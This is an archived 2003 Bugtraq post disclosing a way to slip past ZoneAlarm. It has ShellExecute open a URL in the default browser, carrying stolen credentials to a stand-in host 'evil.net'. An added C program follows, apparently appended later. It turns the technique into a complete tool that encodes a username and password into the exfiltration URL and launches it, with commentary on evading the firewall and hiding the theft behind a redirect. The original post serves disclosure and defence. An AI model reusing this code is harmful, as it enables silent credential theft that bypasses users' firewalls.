Message-ID: <20030623061246.7134.qmail@www.securityfocus.com>
Date: 23 Jun 2003 06:12:46 -0000
From: <aceh@...vetch.bg>
To: bugtraq@...urityfocus.com
Subject: Bypassing ZoneAlarm (limited)

Hi everyone. 
I don't know if this is a new issue, but it is a simple way to
bypass (in some limited form) ZoneAlarm's application-level
Internet access blocking.

The Windows DLL shell32.dll exports a well-known and documented function called
ShellExecute. From the Win32 Programmer's Reference:

>HINSTANCE ShellExecute(
>  HWND hwnd,              // handle to parent window
>  LPCTSTR lpOperation,    // pointer to string that specifies
>                          // operation to perform
>  LPCTSTR lpFile,         // pointer to filename or folder name string
>  LPCTSTR lpParameters,   // pointer to string that specifies
>                          // executable-file parameters
>  LPCTSTR lpDirectory,    // pointer to string that specifies default
>                          // directory
>  INT nShowCmd            // whether file is shown when opened
>  );

When the lpFile parameter is an Internet URL, Windows invokes Internet
Explorer (or, more accurately, the default web browser), which in 99% of
the cases is allowed to access the Internet, with that URL. Example:

#include <windows.h>
#include <shellapi.h>

ShellExecute(
  0,
  "open",
  "http://evil.net/collect.cgi?un=stolen_username&pw=stolen_password",
  0,
  0,
  SW_HIDE   // This doesn't work.
            // I think it is supposed to hide the window but ...
  );

The collect.cgi (after storing stolen_username/stolen_password) could 
redirect the user for example to 
windowsupdate.microsoft.com, 
so that many users will not even suspect anything.

The info leaked is limited by the maximum allowed URL length, but that
could be more than enough for a malicious application to send some
username/password/cookie/cc_number info to a malicious server.

This was tested on ZoneAlarm 3.1.395 (freeware), but I guess that all
versions can be tricked if the user has granted access to his default
web browser by default (very likely).

VENDOR STATUS:
I think that this is a flaw in the core design of ZoneAlarm
(and/or Windows) and don't see a way it can be fixed.

WORKAROUND:
Do not allow ANY application to access Internet by default and 
review each request separately.

Any comments are welcome.
aceh
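The following C program is an added example and is not part of the original post. It works the technique above through end to end: the stolen fields are percent-encoded into the query string, the result is refused if it would exceed a fixed URL length (the limitation the post points out), and the finished URL is handed to whatever handles http:// via ShellExecute, so the request leaves the machine under the browser's ZoneAlarm permission rather than the calling program's. evil.net and collect.cgi are the post's own placeholders; MAX_URL_LEN of 2083 is an assumed ceiling, the sample credentials are constructed, and the ShellExecute call only compiles on Windows (elsewhere the program just prints the URL it would launch).

```c
/* Added example, not code from the original post. Builds the exfiltration
 * URL the post describes and launches it through the default browser. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stddef.h>
#ifdef _WIN32
#include <windows.h>
#include <shellapi.h>
#endif

#define MAX_URL_LEN 2083   /* assumed ceiling on the URL the browser will accept */

/* Percent-encode src into dst, passing RFC 3986 unreserved characters through.
 * Returns the number of bytes written (excluding the NUL), or -1 if dst is
 * too small to hold the encoded string. */
static int url_encode(const char *src, char *dst, size_t dstlen) {
    static const char hex[] = "0123456789ABCDEF";
    size_t n = 0;
    for (; *src; src++) {
        unsigned char c = (unsigned char)*src;
        int unreserved = (c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z') ||
                         (c >= '0' && c <= '9') || c == '-' || c == '_' ||
                         c == '.' || c == '~';
        if (unreserved) {
            if (n + 1 >= dstlen) return -1;
            dst[n++] = (char)c;
        } else {
            if (n + 3 >= dstlen) return -1;
            dst[n++] = '%';
            dst[n++] = hex[c >> 4];
            dst[n++] = hex[c & 0x0F];
        }
    }
    dst[n] = '\0';
    return (int)n;
}

/* Assemble http://host/script?un=...&pw=... into out. Returns 0 on success,
 * -1 if the encoded URL would not fit in out or would exceed MAX_URL_LEN. */
int build_exfil_url(const char *host, const char *script,
                    const char *username, const char *password,
                    char *out, size_t outlen) {
    char un[MAX_URL_LEN], pw[MAX_URL_LEN];
    if (url_encode(username, un, sizeof un) < 0) return -1;
    if (url_encode(password, pw, sizeof pw) < 0) return -1;
    int n = snprintf(out, outlen, "http://%s/%s?un=%s&pw=%s", host, script, un, pw);
    if (n < 0 || (size_t)n >= outlen || n > MAX_URL_LEN) return -1;
    return 0;
}

/* Hand the URL to the default browser. The post notes SW_HIDE did not hide the
 * window, so SW_SHOWNORMAL is used here. ShellExecute returns a value > 32 on
 * success. Off Windows this only reports what it would have launched. */
int launch_via_default_browser(const char *url) {
#ifdef _WIN32
    HINSTANCE h = ShellExecuteA(NULL, "open", url, NULL, NULL, SW_SHOWNORMAL);
    return ((INT_PTR)h > 32) ? 0 : -1;
#else
    printf("would ShellExecute: %s\n", url);
    return 0;
#endif
}

int main(void) {
    char url[MAX_URL_LEN + 1];
    /* constructed sample credentials; the '&' and space show why encoding is needed */
    if (build_exfil_url("evil.net", "collect.cgi", "alice@example.com", "p@ss word&1",
                        url, sizeof url) != 0) {
        fprintf(stderr, "url too long\n");
        return 1;
    }
    return launch_via_default_browser(url) == 0 ? 0 : 1;
}
```

Nothing here touches a socket, which is exactly the point: a per-application firewall rule on the calling program never sees the traffic, and the only observable artefact is a browser window opening, which collect.cgi can make look innocent by redirecting to a trusted site.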

